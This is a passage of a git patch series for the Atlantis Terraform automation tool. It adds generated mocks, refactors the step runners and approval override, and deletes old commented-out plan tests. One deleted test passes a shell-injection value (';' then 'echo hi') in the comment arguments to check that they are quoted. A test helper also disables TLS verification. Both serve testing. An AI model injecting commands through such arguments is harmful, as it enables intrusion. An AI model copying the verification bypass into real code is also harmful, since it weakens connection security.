+			Type:     models.Github,
+			Hostname: "github.com",
+		},
+	}, models.PullRequest{
+		Num: 1,
+	})
+	Ok(t, err)
+	Equals(t, []string{"file1.txt", "file2.txt"}, files)
+}
+
+func TestGithubClient_UpdateStatus(t *testing.T) {
+	cases := []struct {
+		status   vcs.CommitStatus
+		expState string
+	}{
+		{
+			vcs.Pending,
+			"pending",
+		},
+		{
+			vcs.Success,
+			"success",
+		},
+		{
+			vcs.Failed,
+			"failure",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.status.String(), func(t *testing.T) {
+			testServer := httptest.NewTLSServer(
+				http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+					switch r.RequestURI {
+					case "/api/v3/repos/owner/repo/statuses/":
+						body, err := ioutil.ReadAll(r.Body)
+						Ok(t, err)
+						exp := fmt.Sprintf(`{"state":"%s","description":"description","context":"Atlantis"}%s`, c.expState, "\n")
+						Equals(t, exp, string(body))
+						defer r.Body.Close() // nolint: errcheck
+						w.WriteHeader(http.StatusOK)
+					default:
+						t.Errorf("got unexpected request at %q", r.RequestURI)
+						http.Error(w, "not found", http.StatusNotFound)
+						return
+					}
+				}))
+
+			testServerURL, err := url.Parse(testServer.URL)
+			Ok(t, err)
+			client, err := vcs.NewGithubClient(testServerURL.Host, "user", "pass")
+			Ok(t, err)
+			defer disableSSLVerification()()
+
+			err = client.UpdateStatus(models.Repo{
+				FullName:          "owner/repo",
+				Owner:             "owner",
+				Name:              "repo",
+				CloneURL:          "",
+				SanitizedCloneURL: "",
+				VCSHost: models.VCSHost{
+					Type:     models.Github,
+					Hostname: "github.com",
+				},
+			}, models.PullRequest{
+				Num: 1,
+			}, c.status, "description")
+			Ok(t, err)
+		})
+	}
+}
+
+// disableSSLVerification disables ssl verification for the global http client
+// and returns a function to be called in a defer that will re-enable it.
+func disableSSLVerification() func() {
+	orig := http.DefaultTransport.(*http.Transport).TLSClientConfig
+	http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
+	return func() {
+		http.DefaultTransport.(*http.Transport).TLSClientConfig = orig
+	}
+}

From f067818aa54d89dbf8230cc4226d3f6bb99aba01 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sun, 1 Jul 2018 23:48:32 +0200
Subject: [PATCH 63/69] Test project command runner.

---
 .../mocks/matchers/webhooks_applyresult.go    |  20 +
 server/events/mocks/mock_step_runner.go       |  88 +++
 server/events/mocks/mock_webhooks_sender.go   |  81 +++
 server/events/models/models.go                |   5 +-
 server/events/project_command_builder.go      |  22 +-
 server/events/project_command_builder_test.go |   6 +-
 server/events/project_command_runner.go       |  33 +-
 server/events/project_command_runner_test.go  | 673 +++++++++++-------
 .../mocks/matchers/models_pullrequest.go      |  20 +
 .../runtime/mocks/matchers/models_repo.go     |  20 +
 .../mocks/mock_pull_approved_checker.go       |  84 +++
 .../events/runtime/pull_approved_checker.go   |   2 +
 server/events/working_dir_locker.go           |  16 +-
 server/events/working_dir_locker_test.go      |  16 +-
 server/events_controller_e2e_test.go          |  11 +-
 server/server.go                              |  20 +-
 16 files changed, 780 insertions(+), 337 deletions(-)
 create mode 100644 server/events/mocks/matchers/webhooks_applyresult.go
 create mode 100644 server/events/mocks/mock_step_runner.go
 create mode 100644 server/events/mocks/mock_webhooks_sender.go
 create mode 100644 server/events/runtime/mocks/matchers/models_pullrequest.go
 create mode 100644 server/events/runtime/mocks/matchers/models_repo.go
 create mode 100644 server/events/runtime/mocks/mock_pull_approved_checker.go

diff --git a/server/events/mocks/matchers/webhooks_applyresult.go b/server/events/mocks/matchers/webhooks_applyresult.go
new file mode 100644
index 0000000000..2a643f6034
--- /dev/null
+++ b/server/events/mocks/matchers/webhooks_applyresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	webhooks "github.com/runatlantis/atlantis/server/events/webhooks"
+)
+
+func AnyWebhooksApplyResult() webhooks.ApplyResult {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(webhooks.ApplyResult))(nil)).Elem()))
+	var nullValue webhooks.ApplyResult
+	return nullValue
+}
+
+func EqWebhooksApplyResult(value webhooks.ApplyResult) webhooks.ApplyResult {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue webhooks.ApplyResult
+	return nullValue
+}
diff --git a/server/events/mocks/mock_step_runner.go b/server/events/mocks/mock_step_runner.go
new file mode 100644
index 0000000000..5668e90ffd
--- /dev/null
+++ b/server/events/mocks/mock_step_runner.go
@@ -0,0 +1,88 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: StepRunner)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockStepRunner struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockStepRunner() *MockStepRunner {
+	return &MockStepRunner{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+	params := []pegomock.Param{ctx, extraArgs, path}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("Run", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 string
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(string)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockStepRunner) VerifyWasCalledOnce() *VerifierStepRunner {
+	return &VerifierStepRunner{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockStepRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierStepRunner {
+	return &VerifierStepRunner{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockStepRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierStepRunner {
+	return &VerifierStepRunner{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierStepRunner struct {
+	mock                   *MockStepRunner
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) *StepRunner_Run_OngoingVerification {
+	params := []pegomock.Param{ctx, extraArgs, path}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Run", params)
+	return &StepRunner_Run_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type StepRunner_Run_OngoingVerification struct {
+	mock              *MockStepRunner
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *StepRunner_Run_OngoingVerification) GetCapturedArguments() (models.ProjectCommandContext, []string, string) {
+	ctx, extraArgs, path := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1], extraArgs[len(extraArgs)-1], path[len(path)-1]
+}
+
+func (c *StepRunner_Run_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext, _param1 [][]string, _param2 []string) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]models.ProjectCommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(models.ProjectCommandContext)
+		}
+		_param1 = make([][]string, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.([]string)
+		}
+		_param2 = make([]string, len(params[2]))
+		for u, param := range params[2] {
+			_param2[u] = param.(string)
+		}
+	}
+	return
+}
diff --git a/server/events/mocks/mock_webhooks_sender.go b/server/events/mocks/mock_webhooks_sender.go
new file mode 100644
index 0000000000..dfd588807a
--- /dev/null
+++ b/server/events/mocks/mock_webhooks_sender.go
@@ -0,0 +1,81 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WebhooksSender)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	webhooks "github.com/runatlantis/atlantis/server/events/webhooks"
+	logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockWebhooksSender struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockWebhooksSender() *MockWebhooksSender {
+	return &MockWebhooksSender{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWebhooksSender) Send(log *logging.SimpleLogger, res webhooks.ApplyResult) error {
+	params := []pegomock.Param{log, res}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("Send", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(error)
+		}
+	}
+	return ret0
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalledOnce() *VerifierWebhooksSender {
+	return &VerifierWebhooksSender{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWebhooksSender {
+	return &VerifierWebhooksSender{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWebhooksSender {
+	return &VerifierWebhooksSender{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWebhooksSender struct {
+	mock                   *MockWebhooksSender
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWebhooksSender) Send(log *logging.SimpleLogger, res webhooks.ApplyResult) *WebhooksSender_Send_OngoingVerification {
+	params := []pegomock.Param{log, res}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Send", params)
+	return &WebhooksSender_Send_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WebhooksSender_Send_OngoingVerification struct {
+	mock              *MockWebhooksSender
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WebhooksSender_Send_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, webhooks.ApplyResult) {
+	log, res := c.GetAllCapturedArguments()
+	return log[len(log)-1], res[len(res)-1]
+}
+
+func (c *WebhooksSender_Send_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []webhooks.ApplyResult) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]*logging.SimpleLogger, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(*logging.SimpleLogger)
+		}
+		_param1 = make([]webhooks.ApplyResult, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(webhooks.ApplyResult)
+		}
+	}
+	return
+}
diff --git a/server/events/models/models.go b/server/events/models/models.go
index e54e42f548..db4eb1c820 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -238,7 +238,6 @@ type ProjectCommandContext struct {
 
 	// CommentArgs are the extra arguments appended to comment,
 	// ex. atlantis plan -- -target=resource
-	CommentArgs             []string
-	Workspace               string
-	RequireApprovalOverride bool
+	CommentArgs []string
+	Workspace   string
 }
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 549bbb3172..cff97ed38c 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -29,7 +29,6 @@ type DefaultProjectCommandBuilder struct {
 	VCSClient           vcs.ClientProxy
 	WorkingDir          WorkingDir
 	WorkingDirLocker    WorkingDirLocker
-	RequireApproval     bool
 	AllowRepoConfig     bool
 	AllowRepoConfigFlag string
 }
@@ -180,17 +179,16 @@ func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContex
 	}
 
 	return models.ProjectCommandContext{
-		BaseRepo:                ctx.BaseRepo,
-		HeadRepo:                ctx.HeadRepo,
-		Pull:                    ctx.Pull,
-		User:                    ctx.User,
-		Log:                     ctx.Log,
-		CommentArgs:             cmd.Flags,
-		Workspace:               workspace,
-		RepoRelDir:              dir,
-		ProjectConfig:           projCfg,
-		GlobalConfig:            globalCfg,
-		RequireApprovalOverride: p.RequireApproval,
+		BaseRepo:      ctx.BaseRepo,
+		HeadRepo:      ctx.HeadRepo,
+		Pull:          ctx.Pull,
+		User:          ctx.User,
+		Log:           ctx.Log,
+		CommentArgs:   cmd.Flags,
+		Workspace:     workspace,
+		RepoRelDir:    dir,
+		ProjectConfig: projCfg,
+		GlobalConfig:  globalCfg,
 	}, nil
 }
 
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
index 1a50de40be..e9278a2042 100644
--- a/server/events/project_command_builder_test.go
+++ b/server/events/project_command_builder_test.go
@@ -190,7 +190,7 @@ projects:
 			When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
 
 			builder := &events.DefaultProjectCommandBuilder{
-				WorkingDirLocker: events.NewDefaultAtlantisWorkingDirLocker(),
+				WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
 				WorkingDir:       workingDir,
 				ParserValidator:  &yaml.ParserValidator{},
 				VCSClient:        vcsClient,
@@ -216,7 +216,6 @@ projects:
 				Equals(t, models.User{}, actCtx.User)
 				Equals(t, logger, actCtx.Log)
 				Equals(t, 0, len(actCtx.CommentArgs))
-				Equals(t, false, actCtx.RequireApprovalOverride)
 
 				Equals(t, expCtx.projectConfig, actCtx.ProjectConfig)
 				Equals(t, expCtx.dir, actCtx.RepoRelDir)
@@ -412,7 +411,7 @@ projects:
 				When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
 
 				builder := &events.DefaultProjectCommandBuilder{
-					WorkingDirLocker: events.NewDefaultAtlantisWorkingDirLocker(),
+					WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
 					WorkingDir:       workingDir,
 					ParserValidator:  &yaml.ParserValidator{},
 					VCSClient:        vcsClient,
@@ -446,7 +445,6 @@ projects:
 				Equals(t, pull, actCtx.Pull)
 				Equals(t, models.User{}, actCtx.User)
 				Equals(t, logger, actCtx.Log)
-				Equals(t, false, actCtx.RequireApprovalOverride)
 
 				Equals(t, c.ExpProjectConfig, actCtx.ProjectConfig)
 				Equals(t, c.ExpDir, actCtx.RepoRelDir)
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 8f74af6a93..1da06d1ad0 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -34,8 +34,16 @@ type LockURLGenerator interface {
 	GenerateLockURL(lockID string) string
 }
 
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_step_runner.go StepRunner
+
+type StepRunner interface {
+	Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_webhooks_sender.go WebhooksSender
+
 type WebhooksSender interface {
-	Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error
+	Send(log *logging.SimpleLogger, res webhooks.ApplyResult) error
 }
 
 // PlanSuccess is the result of a successful plan.
@@ -52,16 +60,17 @@ type ProjectCommandRunner interface {
 }
 
 type DefaultProjectCommandRunner struct {
-	Locker              ProjectLocker
-	LockURLGenerator    LockURLGenerator
-	InitStepRunner      runtime.InitStepRunner
-	PlanStepRunner      runtime.PlanStepRunner
-	ApplyStepRunner     runtime.ApplyStepRunner
-	RunStepRunner       runtime.RunStepRunner
-	PullApprovedChecker runtime.PullApprovedChecker
-	WorkingDir          WorkingDir
-	Webhooks            WebhooksSender
-	WorkingDirLocker    WorkingDirLocker
+	Locker                  ProjectLocker
+	LockURLGenerator        LockURLGenerator
+	InitStepRunner          StepRunner
+	PlanStepRunner          StepRunner
+	ApplyStepRunner         StepRunner
+	RunStepRunner           StepRunner
+	PullApprovedChecker     runtime.PullApprovedChecker
+	WorkingDir              WorkingDir
+	Webhooks                WebhooksSender
+	WorkingDirLocker        WorkingDirLocker
+	RequireApprovalOverride bool
 }
 
 func (p *DefaultProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
@@ -160,7 +169,7 @@ func (p *DefaultProjectCommandRunner) Apply(ctx models.ProjectCommandContext) Pr
 	if ctx.ProjectConfig != nil {
 		applyRequirements = ctx.ProjectConfig.ApplyRequirements
 	}
-	if ctx.RequireApprovalOverride {
+	if p.RequireApprovalOverride {
 		applyRequirements = []string{raw.ApprovedApplyRequirement}
 	}
 	for _, req := range applyRequirements {
diff --git a/server/events/project_command_runner_test.go b/server/events/project_command_runner_test.go
index 8d7e63682a..85e2e2826b 100644
--- a/server/events/project_command_runner_test.go
+++ b/server/events/project_command_runner_test.go
@@ -13,277 +13,402 @@
 //
 package events_test
 
-//
-//import (
-//	"errors"
-//	"testing"
-//
-//	"github.com/mohae/deepcopy"
-//	. "github.com/petergtz/pegomock"
-//	"github.com/runatlantis/atlantis/server/events"
-//	"github.com/runatlantis/atlantis/server/events/locking"
-//	lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
-//	"github.com/runatlantis/atlantis/server/events/mocks"
-//	"github.com/runatlantis/atlantis/server/events/models"
-//	rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
-//	tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
-//	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
-//	"github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers"
-//	"github.com/runatlantis/atlantis/server/logging"
-//	. "github.com/runatlantis/atlantis/testing"
-//)
-//
-//var planCtx = events.CommandContext{
-//	Command: &events.Command{
-//		Name:      events.Plan,
-//		Workspace: "workspace",
-//		RepoRelDir:       "",
-//	},
-//	Log:      logging.NewNoopLogger(),
-//	BaseRepo: models.Repo{},
-//	HeadRepo: models.Repo{},
-//	Pull:     models.PullRequest{},
-//	User: models.User{
-//		Username: "anubhavmishra",
-//	},
-//}
-//
-//func TestExecute_ModifiedFilesErr(t *testing.T) {
-//	t.Log("If GetModifiedFiles returns an error we return an error")
-//	p, _, _ := setupPlanExecutorTest(t)
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err"))
-//	r := p.Execute(&planCtx)
-//
-//	Assert(t, r.Error != nil, "exp .Error to be set")
-//	Equals(t, "getting modified files: err", r.Error.Error())
-//}
-//
-//func TestExecute_NoModifiedProjects(t *testing.T) {
-//	t.Log("If there are no modified projects we return a failure")
-//	p, _, _ := setupPlanExecutorTest(t)
-//	// We don't need to actually mock VCSClient.GetModifiedFiles because by
-//	// default it will return an empty slice which is what we want for this test.
-//	r := p.Execute(&planCtx)
-//
-//	Equals(t, "No Terraform files were modified.", r.Failure)
-//}
-//
-//func TestExecute_CloneErr(t *testing.T) {
-//	t.Log("If WorkingDir.Clone returns an error we return an error")
-//	p, _, _ := setupPlanExecutorTest(t)
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err"))
-//	r := p.Execute(&planCtx)
-//
-//	Assert(t, r.Error != nil, "exp .Error to be set")
-//	Equals(t, "err", r.Error.Error())
-//}
-//
-//func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) {
-//	t.Log("Test that we run plan in the right directory and workspace if they're set")
-//	p, runner, _ := setupPlanExecutorTest(t)
-//	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
-//	ctx.Log = logging.NewNoopLogger()
-//	ctx.Command.RepoRelDir = "dir1/dir2"
-//	ctx.Command.Workspace = "workspace-flag"
-//
-//	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")).
-//		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "dir1/dir2"})).
-//		ThenReturn(events.PreExecuteResult{
-//			LockResponse: locking.TryLockResponse{
-//				LockKey: "key",
-//			},
-//		})
-//	r := p.Execute(&ctx)
-//
-//	runner.VerifyWasCalledOnce().RunCommandWithVersion(
-//		ctx.Log,
-//		"/tmp/clone-repo/dir1/dir2",
-//		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"},
-//		nil,
-//		"workspace-flag",
-//	)
-//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-//	result := r.ProjectResults[0]
-//	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
-//	Equals(t, "", result.PlanSuccess.TerraformOutput)
-//	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-//}
-//
-//func TestExecute_AddedArgs(t *testing.T) {
-//	t.Log("Test that we include extra-args added to the comment in the plan command")
-//	p, runner, _ := setupPlanExecutorTest(t)
-//	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
-//	ctx.Log = logging.NewNoopLogger()
-//	ctx.Command.CommentArgs = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
-//
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-//	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
-//		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
-//		ThenReturn(events.PreExecuteResult{
-//			LockResponse: locking.TryLockResponse{
-//				LockKey: "key",
-//			},
-//		})
-//	r := p.Execute(&ctx)
-//
-//	runner.VerifyWasCalledOnce().RunCommandWithVersion(
-//		ctx.Log,
-//		"/tmp/clone-repo",
-//		[]string{
-//			"plan",
-//			"-refresh",
-//			"-no-color",
-//			"-out",
-//			"/tmp/clone-repo/workspace.tfplan",
-//			"-var",
-//			"atlantis_user=anubhavmishra",
-//			// NOTE: extra args should be quoted to prevent an attacker from
-//			// appending malicious commands.
-//			"\"-target=resource\"",
-//			"\"-var\"",
-//			"\"a=b\"",
-//			"\";\"",
-//			"\"echo\"",
-//			"\"hi\"",
-//		},
-//		nil,
-//		"workspace",
-//	)
-//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-//	result := r.ProjectResults[0]
-//	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
-//	Equals(t, "", result.PlanSuccess.TerraformOutput)
-//	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-//}
-//
-//func TestExecute_Success(t *testing.T) {
-//	t.Log("If there are no errors, the plan should be returned")
-//	p, runner, _ := setupPlanExecutorTest(t)
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-//		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
-//		ThenReturn(events.PreExecuteResult{
-//			LockResponse: locking.TryLockResponse{
-//				LockKey: "key",
-//			},
-//		})
-//
-//	r := p.Execute(&planCtx)
-//
-//	runner.VerifyWasCalledOnce().RunCommandWithVersion(
-//		planCtx.Log,
-//		"/tmp/clone-repo",
-//		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
-//		nil,
-//		"workspace",
-//	)
-//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-//	result := r.ProjectResults[0]
-//	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
-//	Equals(t, "", result.PlanSuccess.TerraformOutput)
-//	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-//}
-//
-//func TestExecute_PreExecuteResult(t *testing.T) {
-//	t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it")
-//	p, _, _ := setupPlanExecutorTest(t)
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-//		ThenReturn("/tmp/clone-repo", nil)
-//	projectResult := events.ProjectResult{
-//		Failure: "failure",
-//	}
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
-//		ThenReturn(events.PreExecuteResult{ProjectResult: projectResult})
-//	r := p.Execute(&planCtx)
-//
-//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-//	result := r.ProjectResults[0]
-//	Equals(t, "failure", result.Failure)
-//}
-//
-//func TestExecute_MultiProjectFailure(t *testing.T) {
-//	t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.")
-//	p, runner, locker := setupPlanExecutorTest(t)
-//	// Two projects have been modified so we should run plan in two paths.
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil)
-//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-//		ThenReturn("/tmp/clone-repo", nil)
-//
-//	// Both projects will succeed in the PreExecute stage.
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "path1"})).
-//		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}})
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "path2"})).
-//		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}})
-//
-//	// The first project will fail when running plan
-//	When(runner.RunCommandWithVersion(
-//		planCtx.Log,
-//		"/tmp/clone-repo/path1",
-//		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
-//		nil,
-//		"workspace",
-//	)).ThenReturn("", errors.New("path1 err"))
-//	// The second will succeed. We don't need to stub it because by default it
-//	// will return a nil error.
-//	r := p.Execute(&planCtx)
-//
-//	// We expect Unlock to be called for the failed project.
-//	locker.VerifyWasCalledOnce().Unlock("key1")
-//
-//	// So at the end we expect the first project to return an error and the second to be successful.
-//	Assert(t, len(r.ProjectResults) == 2, "exp two project results")
-//	result1 := r.ProjectResults[0]
-//	Assert(t, result1.Error != nil, "exp err to not be nil")
-//	Equals(t, "path1 err\n", result1.Error.Error())
-//
-//	result2 := r.ProjectResults[1]
-//	Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil")
-//	Equals(t, "", result2.PlanSuccess.TerraformOutput)
-//	Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL)
-//}
-//
-//func TestExecute_PostPlanCommands(t *testing.T) {
-//	t.Log("Should execute post-plan commands and return if there is an error")
-//	p, _, _ := setupPlanExecutorTest(t)
-//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-//		ThenReturn("/tmp/clone-repo", nil)
-//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", RepoRelDir: "."})).
-//		ThenReturn(events.PreExecuteResult{
-//			ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}},
-//		})
-//	When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")).
-//		ThenReturn("", errors.New("err"))
-//
-//	r := p.Execute(&planCtx)
-//
-//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-//	result := r.ProjectResults[0]
-//	Assert(t, result.Error != nil, "exp plan error to not be nil")
-//	Equals(t, "running post plan commands: err", result.Error.Error())
-//}
-//
-//func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) {
-//	RegisterMockTestingT(t)
-//	vcsProxy := vcsmocks.NewMockClientProxy()
-//	w := mocks.NewMockWorkingDir()
-//	ppe := mocks.NewMockProjectPreExecutor()
-//	runner := tmocks.NewMockClient()
-//	locker := lmocks.NewMockLocker()
-//	run := rmocks.NewMockRunner()
-//	p := events.PlanExecutor{
-//		VCSClient:         vcsProxy,
-//		ProjectFinder:     &events.DefaultProjectFinder{},
-//		Workspace:         w,
-//		ProjectPreExecute: ppe,
-//		Terraform:         runner,
-//		Locker:            locker,
-//		Run:               run,
-//	}
-//	return &p, runner, locker
-//}
+import (
+	"os"
+	"strings"
+	"testing"
+
+	. "github.com/petergtz/pegomock"
